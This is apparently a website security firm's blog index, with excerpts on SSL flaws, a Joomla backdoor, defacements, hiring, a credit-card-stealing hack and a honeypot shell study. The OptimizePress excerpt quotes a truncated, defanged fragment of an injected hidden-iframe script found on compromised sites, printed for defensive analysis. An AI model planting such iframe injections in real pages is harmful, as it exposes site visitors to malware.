Most Common Attacks Affecting Today’s Websites

New web-based attack types and vectors are coming out every day, this is causing businesses, communities and individuals to take security seriously now more than they ever have in the past. This is a huge win for the World Wide Web and it’s a trend that is pushing technology further towards more robust and securely developed web applications.

The recent discovery of another vulnerability in SSL has led thought-leaders and developers to immediately phase out the weak aspect of the protocol. The implementation of SSLv3, and its exploitable nature, gained its marketable canine acronym POODLE for describing the ability to force users to downgrade their encryption to a breakable standard, revealing their sensitive data as if it were being passed in clear text.

Read More

Highly Effective Joomla Backdoor with Small Profile

It feels like every day we’re finding gems, or what appear to be gems to us. We try to balance the use of the term, but I can’t lie – these are truly gems. The methods that attackers are implementing are, in some instances, ingenious. I think you’ll agree that this case falls into that category.

In short, this is a highly effective backdoor that carries small profile, making it High Speed Low Drag.

Understanding Attackers

As we’ve discussed in the past, most attackers have a pretty standard workflow when compromising websites. Here’s that process in its simplest form:

  1. Identify point of entry / weakness.
  2. Exploit the entry / weakness.
  3. Ensure that they can retain access.
  4. Cover your tracks.

I agree, nothing earth shattering, but it does help us understand what it is we need to be looking for.
Read More

Recent OptimizePress Vulnerability Being Mass Infected

A few weeks ago we wrote about a file upload vulnerability in the OptmizePress theme. We were seeing a few sites being compromised by it, but nothing major.

That all changed yesterday when we detected roughly 2,000 websites compromised with iframes that seemed to be caused by this same vulnerability. All of the contaminated websites that we have reviewed and cleared were using OptmizePress, and they all had the same iFrame injected in them:

<script> if(document.all ){ document.write ("<iframe 
 src=" httx:// ohui.cgi?19" width="1" 

Read More

Sucuri Company Meeting – Brazil 2014

2013 was a great year for Sucuri! We were able to add some great services and tools like CloudProxy to help website owners and administrators fight malware. We also grew the Sucuri team quite a bit in an effort to support our products, and more importantly our customers.

We’re very excited about the future, so much so that we pulled in the team for a company meeting to kick off 2014 strong.

Read More

Friday the 13th – A Gallery of Webmaster Nightmares

This post is dedicated to all you geeky horror movie fans out there!

One morning you open your website and don’t recognize it. Something is devastatingly wrong. You wipe the sleep from your eyes, and instantly you know that you’re living your worst nightmare…

As you gain early morning focus from what you thought was a good night sleep, a scary face stares back at you, and declares that you’ve been hacked!

When you see it you know it’s, it’s…it’s…it’s Friday the 13th!!!

Hacked Website Defacement

It’s always Friday the 13th for webmasters of defaced sites, regardless of what their calendar tells. It becomes the most unlucky day in their webmaster life, the day when only bad things can happen.

Hacked Website Defacement 2

We, at Sucuri, come across such hacked sites every day. Every day we help website owners like you survive your Friday the 13th. We restore your sites and make sure this don’t happen again.

When your site is finally restored, and you calm down after the stressful fight for your site, it may eventually occur to you that the defaced page was a piece of some weird modern cyber art.

Hacked Website Defacement 3

OK, maybe you weren’t comparing your defacement to your favorite Van Gogh. We have seen defaced websites every day for the last few years, and after a while you start finding artistic value in some of the “hacked by..” pages you come across.

Sometimes they are disturbing and offensive, sometimes they are scary. Sometimes they are funny, and sometimes they even provide security advice.
In the end, they all reflect the sub-culture of h4x0r$.

Hacked Website Defacement 4

In this post, we’d like to share our collection of screenshots of defaced websites. Lean back and submerge into the world of cyber-chaos.
Once you emerge back from the craziness, think to yourself, and ask yourself the simple question, “Am I prepared to deal with such unfortunate events?”

Hacked Website Defacement 5

Hacked Website Defacement 6

Hacked Website Defacement 7

Hacked Website Defacement 8

Hacked Website Defacement 9

Hacked Website Defacement 10

Hacked Website Defacement 11

Hacked Website Defacement 12

Hacked Website Defacement 13

You can find 100 more screenshots and the whole collection on the Sucuri Facebook page.


Have you encountered such defaced pages on the Internet? Share your own website nightmare, on this eery Friday the 13th!

Sucuri is Hiring – Employment Opportunities

It’s always an exciting time when we can reach out to our community and let folks know that there are new opportunities to join our company. That is where we find ourselves today.

We have reached a point where we need to reach out again and continue our growth trajectory. We are looking for a few good men and women in a variety of fields to join us.

Do you fit any of these?

If so, then let us know because we want to hear from you.

System Administrator (022517)

Technical Requirements:

  • Strong system administration and networking experience
  • Linux Knowledge – High
  • Nginx / Apache – High
  • OpenSSL – High
  • Shell Scripting – High
  • HIDS / IPS / IDS – High

Senior PHP Developer / Ops (022514)

Technical Requirements:

  • Senior developer who can write lean, secure PHP 5 code
  • Ability to adapt to various languages
  • Linux administration and management experience – Plus
  • Firm understanding of security principles and use of good security practices
  • Broad understanding of web architecture and scalable platforms

Senior Security Researcher (022515)

Technical Requirements:

  • Experience white-hat hacking and finding vulnerabilities in web applications / web stacks.
  • Experience with a variety of programming languages, frameworks (WordPress, Joomla, vBulletin, Wiki, etc..) and an understanding on how to exploit them.
  • Strong understand of PHP and SQL is a plus
  • Ability to write Proof of Concepts against vulnerabilities is a plus
  • Knowledge of research and white hat security tools
  • You can take a web site, find vulnerabilities, suggest fixes and build ways to prevent that from being exploited
  • Malware decoding experience is a plus

Senior Frontend Developer (022516)

Technical Requirements:

  • Strong HTML, Javascript and CSS experience
  • Ability to effectively convert designs to functional front-end code
  • Familiarity with CMS applications (i.e., WordPress, Joomla, etc..) is a plus
  • You have built other products before and know what it takes to create responsive and intuitive design

Please submit your resume

If any of these positions sound like something you think you’d be able to excel at then we want to hear from you. Send us an email with your resume to, and let us know why you’d be awesome to work with.

Back to Employment Opportunities

Stealing Credit Cards – A WordPress and vBulletin Hack

What better way to celebrate Thanksgiving than to share an interesting case that involves two of the most popular CMS applications out there – vBulletin and WordPress.

Here is a real case that we just worked on this week, involving an attacker dead set on stealing credit card information. Enjoy!

The Environment

The client runs a fairly successful e-commerce website. They run two main applications within their architecture – vBulletin and WordPress.

vBulletin is used for their support and collaboration forums, while WordPress for their main website and e-commerce. This appears to be a pretty standard configuration across most larger web application environments these days.

Everything is sitting on a LAMP (Linux / Apache / MySQL / PHP) stack, so nothing too special there. For the most part, things are up to date, they might be a version or two behind, but none of it earth shattering or something worth writing home about.

In regards to security, they are running CloudFlare.

All in all, it probably sounds a lot like your environment[s].

Read More

Another Fake WordPress Plugin – And Yet Another SPAM Infection!

We clean hundreds and thousands of infected websites, a lot of the cleanups can be considered to be somewhat “routine”. If you follow our blog, you often hear us say we’ve seen “this” numerous times, we’ve cleaned “that” numerous times.

In most cases when dealing with infected websites, we know where to look and what to remove, generally with a quick look we can determine what’s going. Despite our experience and passion for cleaning up a hacked website, there are always surprises lurking and waiting for us, almost every day.

Some of the most interesting routine cases we deal with are often websites with SPAM. SPAM is in the database, or the whole block of SPAM code is stored in some obscure file. We also deal with cases where the SPAM is loaded within the theme or template header, footer, index, etc. Sometimes these SPAM infections are conditional (e.g. They only appear once per IP), sometimes not.

More often than not however, these infections is not too difficult to identify and remove. In the case we’re writing about in this post, we were able not only to remove malware, but also take a look at what’s going on behind the curtain.

Read More

Case Study: Analyzing a WordPress Attack – Dissecting the webr00t cgi shell – Part I

November 1st started like any other day on the web. Billions of requests were being shot virtually between servers in safe and not so safe attempts to access information. After months of waiting, finally one of those not so safe request hit one of our honeypots.

We won’t get into the location of the site because it really doesn’t matter, a fact that most critics don’t realize. As is often the case, the honeypot site was quiet without much traffic and the weakness was access control.

We intentionally left the password to the site to one of the top 10 passwords, with continuous attempts it took about 3 months before it was accessed.

This time though we were ready and this is how it went..

Read More

Sucuri Expands Research Efforts with Acquisition of Unmask Parasites

Our goal at Sucuri is to be the best website security company of today and in the future.

To help build on our existing research efforts, and to expand our ability to scan websites and detect malware, we are very excited to announce the acquisition of Unmask Parasites.

Unmask Parasites is an online website security service that helps detect illicit content that hackers insert into benign web pages using various security holes. This acquisition is well aligned with our vision and commitment to offer the best website security services and products available today, and in the future.

We are also very pleased to announce that along with the acquisition, we have retained the services of Denis Sinegubko, founder of Unmask Parasites; Denis will be joining our research team.

Read More